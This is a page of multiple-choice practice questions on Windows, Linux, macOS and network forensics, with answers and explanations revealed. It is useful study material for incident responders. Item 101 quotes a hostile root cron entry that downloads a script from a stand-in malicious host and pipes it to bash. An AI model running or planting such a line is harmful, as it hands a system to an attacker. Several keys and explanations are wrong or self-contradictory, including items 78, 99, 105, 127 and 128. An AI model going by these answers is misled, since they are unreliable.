CCNA OS and Network Forensics Questions

75 of 216 questions · Page 2/3 · OS and Network Forensics · Answers revealed

76
MCQeasy

Which Windows artifact is primarily used to determine the execution history of applications, including the path and run count?

A.LNK files
B.Jump lists
C.Prefetch files
D.Event logs
AnswerC

Prefetch files contain execution history, path, and run count for applications.

Why this answer

Prefetch files (.pf) store information about recently executed applications, including execution count and timestamps. They are located in C:\Windows\Prefetch.

77
Multi-Selecthard

A security analyst is investigating a potential webshell on an IIS server. Which THREE artifacts are commonly associated with webshell presence?

Select 3 answers
A.Increase in NetFlow traffic to a known good update server
B.Presence of encoded scripts in the web application directory
C.Event ID 4624 logon events from the service account
D.Unusual HTTP POST requests to .asp or .aspx files in IIS logs
E.Process creation events for cmd.exe or powershell.exe spawned by w3wp.exe
AnswersB, D, E

Webshell files are typically stored in web-accessible directories.

Why this answer

Webshells leave traces in IIS logs (HTTP requests), file system (malicious files in web directories), and event logs (process creation or errors).

78
MCQmedium

An analyst detects a large amount of data being exfiltrated from a network over DNS queries. Which type of network analysis would BEST detect this activity?

A.Proxy log analysis
B.Firewall log analysis
C.Packet capture analysis
D.IDS/IPS log analysis
AnswerC

Packet capture (e.g., with Wireshark) can inspect DNS query content for encoded data, detecting tunneling.

Why this answer

DNS tunneling uses DNS queries to exfiltrate data. NetFlow analysis can identify unusual DNS traffic patterns, such as large or frequent queries to a domain, while packet capture can reveal the content.

79
MCQeasy

Which Windows Event ID is generated when a new service is installed on a system?

A.4624
B.7045
C.4648
D.4720
AnswerB

Correct. 7045 is the service install event.

Why this answer

Event ID 7045 in the System log is logged when a service is installed, started, or changed.

80
MCQmedium

A Linux investigator wants to see all commands run by a user from the bash shell. Which file should be examined?

A./etc/passwd
B./var/log/auth.log
C.~/.bash_history
D./var/log/syslog
AnswerC

This file stores bash command history.

Why this answer

The .bash_history file in the user's home directory contains the command history for bash.

81
Multi-Selectmedium

An analyst is reviewing firewall logs and sees repeated outbound connections from an internal host to a known malicious IP on port 443. Which TWO network forensic data sources would BEST help determine if data exfiltration occurred?

Select 2 answers
A.NetFlow records showing packet sizes and counts
B.Full packet capture (PCAP) of the sessions
C.IDS alerts for signatures
D.Windows security event logs
E.Proxy logs with TLS interception and decrypted content
AnswersB, E

PCAPs allow reconstruction of data streams.

Why this answer

Full packet capture provides payload content, and TLS interception logs show decrypted traffic if available.

82
MCQeasy

Which Windows Registry hive contains user-specific configuration such as MRU lists and UserAssist artifacts?

A.NTUSER.DAT
B.HKLM\SAM
C.SYSTEM
D.HKLM\System
AnswerA

NTUSER.DAT is the user-specific registry hive.

Why this answer

NTUSER.DAT is the registry hive for user-specific settings, located in %UserProfile%. It contains MRU lists, UserAssist, and other user activity artifacts.

83
MCQeasy

In Windows forensics, which artifact is used to track recently executed programs on a per-user basis?

A.Jump lists
B.UserAssist
C.ShellBags
D.Prefetch files
AnswerB

UserAssist in NTUSER.DAT logs program executions per user.

Why this answer

UserAssist keys in the NTUSER.DAT hive store information about programs executed via Windows Explorer, including run count and last execution time.

84
MCQhard

A forensic analyst finds a suspicious .plist file in /Library/LaunchDaemons/ on a macOS system. The file contains a key "ProgramArguments" with a path to a script in /tmp. Which persistence mechanism does this indicate?

A.Cron job
B.Launch daemon
C.Login item
D.Kernel extension
AnswerB

LaunchDaemons plists in /Library/LaunchDaemons/ define system daemons that run as root at boot.

Why this answer

LaunchDaemons are used for system-wide daemons that start at boot. A plist in /Library/LaunchDaemons/ with ProgramArguments indicates a launch daemon persistence mechanism.

85
MCQmedium

A security analyst reviews firewall logs and sees repeated outbound connections from an internal server to an external IP on port 443. The server is not supposed to initiate outbound connections. Which action should the analyst take FIRST?

A.Block the external IP at the firewall
B.Ignore the traffic as it is encrypted
C.Disable the server's network connection
D.Investigate the server for signs of compromise
AnswerD

Investigating the server will help determine if it is compromised and what actions to take.

Why this answer

The first step is to investigate the server to determine if it's compromised, as outbound connections could indicate C2 communication.

86
MCQhard

A forensic examiner needs to analyze the contents of a Windows prefetch file (.pf) to determine the last execution time of an application. Which tool would BEST accomplish this task?

A.prefetch.exe (built‑in Windows tool)
B.ShellBags Explorer
C.PECmd
D.JumpLister
AnswerC

Correct. PECmd is the standard tool for parsing prefetch files.

Why this answer

Prefetch files contain metadata including last run time and run count. Tools like PECmd (from Eric Zimmerman's tools) are designed to parse .pf files forensically.

87
Multi-Selecthard

Which THREE of the following are indicators of a webshell on a compromised web server? (Select THREE.)

Select 3 answers
A.Multiple failed login attempts in auth.log
B.Presence of system commands in web server error logs
C.Unusual files with .asp, .php, or .jsp extensions in web directories
D.Outbound connections from the web server to suspicious IP addresses
E.High CPU usage from the web server process
AnswersB, C, D

Webshells may execute system commands, appearing in error logs if output is not sanitized.

Why this answer

Webshells are malicious scripts uploaded to a web server. Indicators include anomalous file modifications in web directories, unexpected processes from web server user accounts, and outbound connections from the web server to unknown IPs. CPU spikes can occur but are less specific.

88
MCQmedium

A forensic analyst is examining a Windows system for evidence of a program that runs automatically every time the system starts. Which registry key is commonly used to achieve persistence via the 'Run' key?

A.HKLM\SAM\SAM
B.HKLM\Software\Microsoft\Windows\CurrentVersion\Run
C.HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
D.HKLM\SYSTEM\CurrentControlSet\Services
AnswerB

Programs listed under this key run automatically at system startup.

Why this answer

The Run key under HKLM\Software\Microsoft\Windows\CurrentVersion\Run is a common location for programs to execute at startup. Similar keys exist in HKCU.

89
MCQmedium

A forensic analyst is investigating a Windows system for evidence of USB device usage. Which registry key is MOST useful for determining the first time a USB device was connected and its serial number?

A.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
B.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C.HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellBags
D.HKLM\SYSTEM\CurrentControlSet\Enum\USB
AnswerA

USBSTOR contains USB mass storage devices with serial numbers and timestamps.

Why this answer

The USBSTOR registry key under HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR contains subkeys for each USB device, with properties like serial number and first install date.

90
Multi-Selectmedium

A forensic analyst is examining a Windows system for evidence of USB device usage. Which TWO registry locations are known to store USB device history?

Select 2 answers
A.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
B.HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C.HKLM\Software\Microsoft\Windows NT\CurrentVersion\Prefetch
D.HKCU\Software\Microsoft\Windows\CurrentVersion\Run
E.HKLM\SAM\SAM\Domains\Account\Users
AnswersA, B

USBSTOR lists all USB devices that have been connected.

Why this answer

USB device history is stored in USBSTOR and MountPoints2 keys.

91
MCQmedium

A forensic analyst needs to create a timeline of file system activity from a disk image. Which tool is specifically designed for this purpose and can parse various artifacts such as registry, prefetch, and log files?

A.Wireshark
B.Volatility
C.Plaso (log2timeline)
D.FTK Imager
AnswerC

Plaso creates super timelines from multiple forensic artifacts.

Why this answer

Plaso (log2timeline) is a super timeline tool that parses multiple artifacts to create a comprehensive timeline. Wireshark is for network packets. FTK Imager is for acquisition.

Volatility is for memory analysis.

92
MCQeasy

In network forensics, which tool is commonly used to analyze and visualize NetFlow data to identify network traffic patterns?

A.Wireshark
B.Splunk
C.Nmap
D.SolarWinds NetFlow Traffic Analyzer
AnswerD

Specifically designed to collect and analyze NetFlow data.

Why this answer

Wireshark is a packet analyzer, not a NetFlow analyzer. Nmap scans networks. Splunk can analyze logs but is not specifically a NetFlow tool.

SolarWinds NetFlow Traffic Analyzer is designed for NetFlow analysis.

93
MCQmedium

A security analyst is reviewing firewall logs and notices repeated connection attempts from an internal IP to an external server on TCP port 4444. The internal host is a web server. What is the MOST likely explanation?

A.The web server is serving HTTPS traffic on port 4444
B.The web server is performing DNS queries
C.The web server is being scanned for open ports
D.The web server has a reverse shell connection to a command-and-control server
AnswerD

Outbound connections on non-standard ports (like 4444) from a server often indicate a reverse shell.

Why this answer

Port 4444 is commonly associated with reverse shells (e.g., Metasploit default). A web server making outbound connections to an external server on port 4444 strongly suggests a reverse shell from the web server to a command-and-control (C2) server.

94
MCQmedium

In Windows registry forensics, which key is examined to identify USB devices that were connected to the system?

A.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
B.NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C.HKLM\SAM\SAM\Domains\Account\Users
D.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
AnswerD

USBSTOR enumerates USB storage devices connected to the system.

Why this answer

The USBSTOR key under HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR contains a list of all USB storage devices that have been connected, including their serial numbers.

95
Multi-Selecthard

A security analyst captures network traffic and observes multiple TCP SYN packets sent to a range of IP addresses on port 445, followed by TCP RST packets after 15 seconds. Which THREE indicators suggest this is a network scan?

Select 3 answers
A.The packets are sent to sequential IP addresses in the same subnet
B.No TCP three-way handshake completes for these connections
C.The source IP is from an internal address
D.The same port is targeted across multiple IP addresses
E.The payload contains exploit code for SMB vulnerability
AnswersA, B, D

Scanning often targets sequential or random IPs to find live hosts.

Why this answer

TCP SYN packets to multiple IPs on a single port indicate a port scan. The RST packets after a timeout suggest the targets did not respond, which is common in a sweep. Sequential IPs and the use of port 445 (SMB) are typical of scanning.

The lack of established connections and the specific pattern confirm scanning.

96
MCQmedium

A forensic analyst discovers an unusual entry in the Windows Registry under 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run'. Which persistence mechanism does this represent?

A.Registry Run key persistence
B.Service installation
C.Scheduled task
D.Startup folder
AnswerA

The Run key automatically launches programs at user logon, a common persistence mechanism.

Why this answer

The Run key is a standard location for programs to auto-start when a user logs on. A malicious entry here indicates persistence via registry run keys.

97
Multi-Selectmedium

Which TWO Windows Event IDs are associated with successful logon events? (Select two.)

Select 2 answers
A.4648
B.4624
C.4625
D.7045
E.4720
AnswersA, B

4648 = A logon was attempted using explicit credentials (successful).

Why this answer

Event ID 4624 indicates successful logon; 4648 indicates a logon using explicit credentials (also successful).

98
MCQmedium

In a Windows forensic investigation, the analyst wants to determine which USB devices were connected to the system, including the device serial number and first/last connection times. Which registry hive and key should be examined?

A.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
B.NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C.HKLM\SAM\SAM\Domains\Account\Users
D.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
AnswerD

This key contains subkeys for each USB storage device with serial number and connection times.

Why this answer

USB device history is stored in the SYSTEM registry hive under USBSTOR, which records device class, serial number, and timestamps.

99
MCQhard

A security analyst reviews the following Windows Event log entry: Event ID 4648 with logon type 3, subject user 'CONTOSO\admin', target server 'FS01', target user 'CONTOSO\backupadmin'. What does this event indicate?

A.A user account was created for backupadmin on FS01
B.A service was installed under the backupadmin account
C.An explicit credential logon was performed to access FS01 using the backupadmin account
D.The backupadmin account locked out due to multiple failed attempts
AnswerC

4644 with explicit credential flag indicates RunAs or similar usage, and logon type 3 confirms network logon.

Why this answer

Event ID 4648 records when explicit credentials are used to logon, typically for RunAs or scheduled tasks. Logon type 3 indicates network logon. This means admin used backupadmin credentials to access FS01.

100
MCQhard

A forensic analyst is examining a Windows system and finds a prefetch file named NOTEPAD.EXE-12345678.pf. What information can be gleaned from this artifact? (Select the BEST answer.)

A.It saves a copy of the application's configuration
B.It logs all network connections made by the application
C.It records the application's execution count and last run time
D.The file contains the user's password for the application
AnswerC

Prefetch stores run count and timestamps.

Why this answer

Prefetch files contain the number of times the application was run, last run time, and a list of files loaded during execution. They do not store network connections or user-specific data.

101
MCQmedium

During an incident response, an analyst finds the following entry in /etc/crontab: */5 * * * * root /bin/bash -c 'curl -s http://malicious.com/script.sh | bash'. What is the MOST likely purpose of this entry?

A.Persistence mechanism to maintain access
B.Log cleanup tool
C.System backup script
D.Software update process
AnswerA

Correct. This ensures the attacker's code runs repeatedly.

Why this answer

The cron job runs every 5 minutes as root, downloading and executing a script from a remote server. This is a typical persistence mechanism for a backdoor or command‑and‑control.

102
Multi-Selectmedium

Which TWO Windows registry hives are most commonly analyzed during a forensic investigation to determine user activity and system configuration? (Select TWO.)

Select 2 answers
A.HKLM\SAM
B.HKU\.DEFAULT
C.HKLM\COMPONENTS
D.HKLM\BCD
E.HKCU\...\NTUSER.DAT
AnswersA, E

Contains user account information and password hashes.

Why this answer

SAM stores user account hashes, NTUSER.DAT contains user-specific settings, SYSTEM stores system configuration, SOFTWARE stores installed software info.

103
MCQmedium

During a forensic examination of a macOS system, an investigator wants to review application execution history. Which artifact contains a chronological record of application launches, including timestamps and process IDs?

A.FSEvents
B.com.apple.launchd.plist
C.syslog
D.Unified logging (log command)
AnswerD

Unified logging captures process lifecycle events via the 'log' command.

Why this answer

macOS unified logging provides detailed system activity including application launches. FSEvents records file system changes but not process launches. .plist files may store settings, not execution history.

104
MCQhard

An incident responder examines a Linux server and finds a suspicious cron job that runs every minute and executes a script located in /tmp. Which persistence technique does this represent?

A.Kernel rootkit
B.Web shell
C.SSH key backdoor
D.Cron-based persistence
AnswerD

Cron jobs execute at scheduled intervals, used for persistence.

Why this answer

Cron jobs are a common persistence mechanism on Linux. Attackers often use frequent cron jobs to maintain access.

105
MCQeasy

In a macOS forensic investigation, which log system provides a timeline of high-level system events such as application launches and user logins?

A.syslog
B.FSEvents
C..plist files
D.Unified logging
AnswerB

FSEvents logs file system events, useful for timeline analysis on macOS.

Why this answer

FSEvents is a macOS logging system that records changes to the file system, including application launches and user logins, providing a timeline of system activity.

106
Multi-Selectmedium

A forensic investigator is examining a Linux system compromised via a web application. Which THREE artifacts should the investigator prioritize to determine the attacker's entry point and post-exploitation activities?

Select 3 answers
A./home/compromised_user/.bash_history
B./etc/shadow
C./var/log/auth.log
D.Cron job entries in /etc/crontab
E.Web server access logs (e.g., /var/log/apache2/access.log)
AnswersA, C, E

Bash history shows commands executed by the attacker after gaining access.

Why this answer

The web server logs (access.log) can show the initial exploit request. auth.log may show authentication events if credentials were used. bash_history can reveal commands executed after compromise. cron jobs are persistence mechanisms but not entry point. /etc/shadow stores password hashes, not attack details.

107
MCQmedium

During a forensic examination of a Mac system, an investigator needs to recover historical record of file system events, such as file modifications and deletions. Which artifact should they examine?

A..plist files
B.Unified logging
C.Syslog
D.FSEvents
AnswerD

FSEvents is a Mac feature that records changes to the file system, including modifications and deletions.

Why this answer

FSEvents logs file system changes on macOS, recording events like file creation, modification, and deletion in a binary log.

108
Multi-Selectmedium

Which TWO of the following are tools commonly used for network forensics analysis? (Select two.)

Select 2 answers
A.tcpdump
B.Autopsy
C.Volatility
D.dd
E.Wireshark
AnswersA, E

tcpdump is a command-line packet capture tool used in network forensics.

Why this answer

Wireshark and tcpdump are standard tools for capturing and analyzing network packets. Volatility is for memory forensics, Autopsy is for disk forensics, and dd is for disk imaging.

109
MCQmedium

A forensic analyst is examining browser history from a Chrome installation on a Windows system. Where is the Chrome history database typically stored?

A.%APPDATA%\Mozilla\Firefox\Profiles\
B.%WINDIR%\System32\config\
C.%USERPROFILE%\Favorites\
D.%LOCALAPPDATA%\Google\Chrome\User Data\Default\History
AnswerD

This is the default location for Chrome's history database.

Why this answer

Chrome stores history in an SQLite database file named 'History' located in the user's default profile directory under %LOCALAPPDATA%\Google\Chrome\User Data\Default\.

110
MCQeasy

A security analyst reviews Windows Security Event Log and finds multiple Event ID 4625 entries for a single user account within a few seconds. What does this pattern MOST likely indicate?

A.Service installation
B.Account creation
C.Brute-force password attack
D.Successful logon by the user
AnswerC

Multiple rapid 4625 events indicate repeated failed logins typical of brute force.

Why this answer

Event ID 4625 indicates a failed logon attempt. Multiple rapid failures suggest a brute-force password guessing attack.

111
MCQhard

A Windows system has been compromised. The analyst finds a registry run key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run with value name 'UpdateService' pointing to C:\Users\Public\svchost.exe. Why is this particularly suspicious?

A.The path is not typical for svchost.exe, which resides in System32
B.Run keys are only for startup programs, not services
C.The run key is disabled in Windows 10
D.The registry value name 'UpdateService' is too generic
AnswerA

Correct. Svchost should never be in a user profile folder.

Why this answer

The legitimate svchost.exe runs from C:\Windows\System32, not from C:\Users\Public. This is a common masquerading technique where malware uses a system process name in a user‑writable location.

112
Multi-Selectmedium

During a macOS forensic investigation, which TWO artifacts would be MOST helpful in determining when a file was downloaded from the internet?

Select 2 answers
A.Kernel logs
B..plist files in ~/Library/Preferences
C.Quarantine database
D.FSEvents
E.Apple Unified Logging
AnswersC, E

Quarantine stores information about downloaded files, including timestamps and origin.

Why this answer

The unified logging system records download events, and the Quarantine database (com.apple.quarantine extended attribute or SQLite DB) tracks downloaded files with timestamps and source URLs.

113
MCQhard

A forensic tool parses the Windows registry and reveals that a USB device with VID_0781&PID_5583 was last connected on 2023-10-01. Which registry key is the MOST likely source of this information?

A.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR
B.HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account
C.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB
D.NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
AnswerA

USBSTOR contains entries for USB mass storage devices, with VID/PID and connection timestamps.

Why this answer

USB device history is stored in the USBSTOR registry key, which enumerates devices by their Vendor ID (VID) and Product ID (PID).

114
MCQhard

During a forensic examination of a compromised Windows server, you find a registry key under HKLM\SYSTEM\CurrentControlSet\Services that points to a malicious DLL. Which event ID would have been generated when this service was installed?

A.7045
B.4648
C.4720
D.4624
AnswerA

7045 is service install.

Why this answer

Event ID 7045 is logged when a new service is installed on Windows.

115
MCQmedium

A forensic examiner is analyzing a Mac system and wants to review system logs that record various activities, including application launches and kernel events. Which logging system on macOS should be examined?

A..plist files
B.FSEvents
C.Unified logging (log command)
D.Console.app logs
AnswerC

Centralized logging system for macOS.

Why this answer

Unified logging (via log command) captures system and user activity in a centralized database, replacing traditional syslog.

116
MCQmedium

An analyst identifies an unknown binary running on a Linux server. Which /proc filesystem entry would provide the command-line arguments used to start the process?

A./proc/[pid]/maps
B./proc/[pid]/status
C./proc/[pid]/environ
D./proc/[pid]/cmdline
AnswerD

Contains the full command line of the process.

Why this answer

/proc/[pid]/cmdline contains the command-line arguments of the process, null-separated.

117
MCQmedium

A Linux system administrator notices that the /var/log/auth.log file shows many 'Failed password for root' entries from a single IP address within a short timeframe. Which tool would BEST help the administrator block further access from that IP?

A.nmap
B.iptables
C.tcpdump
D.Wireshark
AnswerB

iptables can add a rule to drop packets from the offending IP.

Why this answer

iptables is a Linux firewall that can block IP addresses. fail2ban can automate this but is not listed; iptables is the direct tool.

118
Multi-Selectmedium

A forensic analyst is investigating a Windows system for persistence mechanisms. Which TWO registry locations are commonly used by malware to achieve auto-start? (Select TWO.)

Select 2 answers
A.HKLM\SYSTEM\CurrentControlSet\Services
B.HKLM\SAM\SAM
C.HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
D.HKCU\Software\Microsoft\Windows\CurrentVersion\Run
E.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
AnswersD, E

This is the Run key for the current user.

Why this answer

Run keys under HKLM and HKCU are common autorun locations used by malware to start on boot or user login.

119
MCQmedium

A forensic analyst examining a Windows machine finds a suspicious service named 'SrvMon' installed. The System event log shows Event ID 7045 at the time of compromise. What does this event indicate?

A.A logon attempt failed
B.A user account was created
C.A service was installed
D.A scheduled task was created
AnswerC

Event ID 7045 signals a new service installation.

Why this answer

Event ID 7045 indicates a new service was installed, which is a common persistence mechanism used by malware.

120
MCQmedium

A security analyst reviews Windows Security Event Logs and finds multiple Event ID 4625 entries from a single source IP address targeting various usernames. Which type of attack is MOST likely occurring?

A.Password spraying attack
B.Brute-force attack on a single account
C.Pass-the-hash attack
D.Kerberoasting attack
AnswerA

Password spraying involves trying a small number of common passwords against many accounts, exactly matching the pattern of multiple usernames from one IP.

Why this answer

Event ID 4625 indicates a failed logon attempt. Multiple failed attempts from one source against different usernames is characteristic of a password spraying attack, where an attacker tries a few common passwords across many accounts.

121
Multi-Selecteasy

Which TWO of the following are typical sources of evidence for network forensics? (Select TWO.)

Select 2 answers
A.Windows registry hives
B.bash_history
C.Firewall logs
D.Prefetch files
E.Packet capture (pcap) files
AnswersC, E

Firewall logs record allowed/denied connections and are key network evidence.

Why this answer

Network forensics relies on capturing and analyzing network traffic. Packet captures (pcap) and firewall logs are primary sources. IDS logs and NetFlow are also used, but IDS logs are more security-specific, and NetFlow provides flow data.

However, the simplest direct sources are packet captures and firewall logs.

122
MCQmedium

An incident responder finds a suspicious LNK file in a user's Startup folder on a Windows system. The LNK file's target is "C:\Windows\System32\rundll32.exe" with a command-line argument "javascript:" followed by encoded text. What is the most likely purpose of this shortcut?

A.A shortcut to a network resource that failed
B.Legitimate update mechanism for Microsoft Office
C.A user-created automation script for daily tasks
D.A malicious persistence mechanism to execute payload via script
AnswerD

Rundll32.exe with JavaScript is a known Living-off-the-Land (LotL) technique for malware.

Why this answer

Rundll32.exe executing JavaScript is a known technique for code execution, often used by malware to run scripts for persistence or payload delivery.

123
MCQeasy

A security analyst reviews Windows Security Event Log and observes Event ID 4625 repeatedly for a single user account from a remote IP address within a short timeframe. What is the MOST likely cause?

A.The user successfully logged on from a remote workstation
B.A brute-force password attack is occurring against that account
C.The user's account was created
D.A service was installed on the system
AnswerB

Repeated failed logons from a remote IP indicate a brute-force attack.

Why this answer

Event ID 4625 indicates a failed logon attempt. Repeated failures from a remote IP suggest a brute-force password guessing attack.

124
MCQmedium

Which network forensic technique involves analyzing the flow of network traffic to identify patterns and anomalies, often using tools like SiLK or nfdump?

A.Port scanning
B.NetFlow analysis
C.Signature-based detection
D.Deep packet inspection
AnswerB

NetFlow analysis uses flow records to summarize traffic, often used for anomaly detection.

Why this answer

NetFlow analysis examines flow records (e.g., IPFIX, NetFlow) to understand traffic patterns, volumes, and anomalies, using tools like SiLK or nfdump.

125
MCQmedium

An analyst suspects that an attacker used a web shell to execute commands on a Windows web server. Which Windows event ID should the analyst look for to detect service installation that may have been used for persistence?

A.7045
B.4624
C.4648
D.4720
AnswerA

Service installation event.

Why this answer

Event ID 7045 indicates a service was installed on the system, which attackers often use to maintain persistence.

126
MCQhard

A Windows system's registry key 'HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR' contains a subkey with a serial number. What does this artifact indicate?

A.A USB network adapter was attached
B.A USB storage device was attached
C.A USB printer was attached
D.A USB keyboard was attached
AnswerB

USBSTOR (USB Storage) records storage devices like flash drives.

Why this answer

The USBSTOR registry key records the serial numbers of USB storage devices that have been connected to the system. Its presence indicates a USB device was attached.

127
MCQhard

An incident responder is analyzing a Linux system and finds a suspicious process running as root. To determine the full command line and environment variables of the process with PID 1234, which file in the /proc filesystem should she examine?

A./proc/1234/status
B./proc/1234/maps
C./proc/1234/cmdline
D./proc/1234/fd
AnswerC

cmdline contains the command line arguments of the process, separated by null bytes.

Why this answer

The /proc/[pid]/cmdline file contains the full command line of the process, and /proc/[pid]/environ contains environment variables. The question asks for both, but cmdline is specifically for command line. However, for both, cmdline is primary.

128
MCQhard

During a forensic investigation of a compromised Linux server, you find the following entry in /var/log/auth.log: 'Mar 10 02:15:30 server sshd[1234]: Failed password for root from 10.0.0.5 port 54321 ssh2'. Which command would you use to extract all failed root login attempts from this log?

A.awk '/Failed password for root/' /var/log/auth.log
B.grep 'Failed password for root' /var/log/auth.log
C.grep 'Failed password for root' /var/log/auth.log
D.grep 'invalid.*root' /var/log/auth.log
AnswerB

This command extracts all lines containing 'Failed password for root', which matches the failed root login attempts.

Why this answer

The grep command can filter lines containing 'Failed password for root' from the auth.log file. The -i flag is unnecessary as the log is case-sensitive but not needed here.

129
MCQhard

A network analyst captures a packet with Wireshark showing a TCP SYN packet from IP 10.0.0.5 to 192.168.1.10 port 443, followed immediately by a SYN‑ACK from 192.168.1.10 to 10.0.0.5, then an RST from 10.0.0.5. What does this sequence MOST likely indicate?

A.A man‑in‑the‑middle attack
B.A denial‑of‑service (SYN flood) attack
C.A normal HTTPS session initiation
D.A TCP SYN scan (stealth scan)
AnswerD

Correct. The RST after SYN‑ACK is characteristic of a SYN scan.

Why this answer

A SYN followed by SYN‑ACK and then RST is typical of a port scan where the scanner sends a SYN, receives a SYN‑ACK (port open), and then immediately resets the connection to avoid completing the handshake.

130
Multi-Selectmedium

Which TWO of the following tools are primarily used for timeline analysis in digital forensics? (Select TWO.)

Select 2 answers
A.Nmap
B.The Sleuth Kit (mactime)
C.Autopsy
D.Plaso
E.Wireshark
AnswersB, D

The Sleuth Kit includes mactime for creating timelines from disk images.

Why this answer

Plaso (log2timeline) and The Sleuth Kit (with mactime) are both used to create super timelines from file system metadata.

131
Multi-Selecthard

Which THREE of the following are commonly used for persistence on a Windows system? (Choose THREE.)

Select 3 answers
A.LNK files
B.Registry Run keys
C.Service installations
D.Prefetch files
E.Scheduled tasks
AnswersB, C, E

Common persistence via auto-start programs.

Why this answer

Registry Run keys, scheduled tasks, and service installations are common persistence mechanisms. Prefetch files and LNK files are forensic artifacts but not persistence mechanisms.

132
MCQhard

During a forensic examination of a macOS system, you find a file at /private/var/log/system.log and also notice a directory /private/var/db/diagnostics/. What is the significance of these locations?

A.They are both plain-text log files used for system monitoring
B.The diagnostics directory contains binary log data from the unified logging system
C.The diagnostics directory contains compressed archives of system.log
D.These locations are remnants of third-party security software
AnswerB

macOS unified logging stores binary logs in diagnostics, providing detailed forensic data.

Why this answer

The unified logging system in macOS stores log data in /private/var/db/diagnostics/ in a binary format, while /var/log/system.log is a legacy plain-text log. The diagnostics directory contains more detailed logs for forensic analysis.

133
Multi-Selecthard

A security analyst is analyzing network traffic and sees the following: Source IP 10.0.0.1, Destination IP 203.0.113.5, TCP SYN flag set, destination port 445. The analyst suspects a worm propagation attempt. Which TWO additional pieces of evidence would strengthen this conclusion?

Select 2 answers
A.The packet size is exactly 66 bytes, identical to other similar packets
B.Multiple similar SYN packets from 10.0.0.1 to many internal IPs on port 445
C.The source MAC address is from a well-known vendor
D.The packet contains a payload with the string "SMBv2"
E.The destination IP 203.0.113.5 is a known web server
AnswersA, B

Uniform packet sizes often indicate automated scanning tools versus legitimate traffic.

Why this answer

Worm propagation often scans many internal hosts on SMB port 445 (indicating lateral movement) and uses consistent payload sizes. A single SYN to an external IP on port 445 could be a normal file share connection. Internal scanning and similar packet sizes are indicative of automated worm behavior.

134
MCQhard

A SOC analyst is analyzing a packet capture from a network where an internal host communicated with a known malicious IP. The analyst uses Wireshark and applies a display filter to isolate all HTTP traffic. Which filter expression should he use?

A.http.request
B.ip.proto == 6
C.tcp.port == 80
D.http
AnswerD

Wireshark's display filter 'http' captures all packets that contain HTTP protocol data.

Why this answer

The correct filter for HTTP traffic in Wireshark is 'http'. Wireshark uses protocol names in lowercase for display filters.

135
MCQmedium

Which Windows artifact is specifically designed to track the most recently used (MRU) files for specific applications and can be found in the NTUSER.DAT registry hive?

A.Prefetch files
B.Jump Lists
C.MRU lists in the registry
D.LNK files
AnswerC

MRU lists are registry keys that store recently accessed files for applications like Notepad and WordPad.

Why this answer

MRU lists are stored in the registry under NTUSER.DAT\(various keys such as \Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePIDlMRU). They track recently opened files.

136
Multi-Selectmedium

Which THREE of the following are commonly used network forensic data sources?

Select 3 answers
A.NetFlow logs
B.Prefetch files
C.IDS/IPS alerts
D.Packet captures (PCAP)
E.Windows registry hives
AnswersA, C, D

NetFlow provides metadata about network flows.

Why this answer

Packet captures (PCAP), NetFlow logs, and IDS/IPS logs are all standard network forensic data sources that provide detail on network traffic.

137
MCQmedium

A forensic analyst is examining a Windows 10 system for evidence of USB device usage. Which registry hive and key path should she check to find a list of USB devices that have been connected to the system?

A.HKLM\SAM\SAM\Domains\Account\Users
B.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
C.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
D.NTUSER.DAT\Software\Microsoft\Windows\ShellNoRoam\BagMRU
AnswerB

This registry key stores information about all USB storage devices ever connected.

Why this answer

USB device history is stored in the SYSTEM hive under CurrentControlSet\Enum\USBSTOR. This key lists all USB storage devices that have been connected.

138
Multi-Selecthard

A security analyst detects suspicious outbound traffic to multiple external IPs on port 443. Which THREE network forensic data sources should be examined to identify the infected host and the nature of the communication?

Select 3 answers
A.Proxy logs
B.IDS/IPS logs
C.Firewall logs
D.Packet captures (PCAP)
E.NetFlow data
AnswersA, B, C

Proxy logs capture HTTP/HTTPS requests, revealing URLs, user agents, and destinations.

Why this answer

Firewall logs, proxy logs, and IDS/IPS logs are essential: firewall logs show allowed/denied connections, proxy logs reveal HTTP/HTTPS traffic details, and IDS/IPS logs detect malicious payloads.

139
MCQmedium

A forensic analyst finds a file with the .plist extension on a Mac system. What type of artifact is this?

A.Log file
B.Executable binary
C.Email database
D.Property list file
AnswerD

.plist files are property lists used for storing configuration data.

Why this answer

.plist (Property List) files store configuration data for applications and system settings on macOS. They can contain user preferences, recent items, and other forensic artifacts.

140
Multi-Selectmedium

Which TWO artifacts are commonly used to identify USB device insertion history on a Windows system? (Select TWO.)

Select 2 answers
A.NTUSER.DAT
B.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
C.prefetch files
D.setupapi.dev.log
E.Event ID 7045
AnswersB, D

USBSTOR enumerates USB storage devices that have been connected.

Why this answer

The USBSTOR registry key and setupapi.dev.log contain information about USB devices connected to the system, including device IDs and timestamps.

141
MCQhard

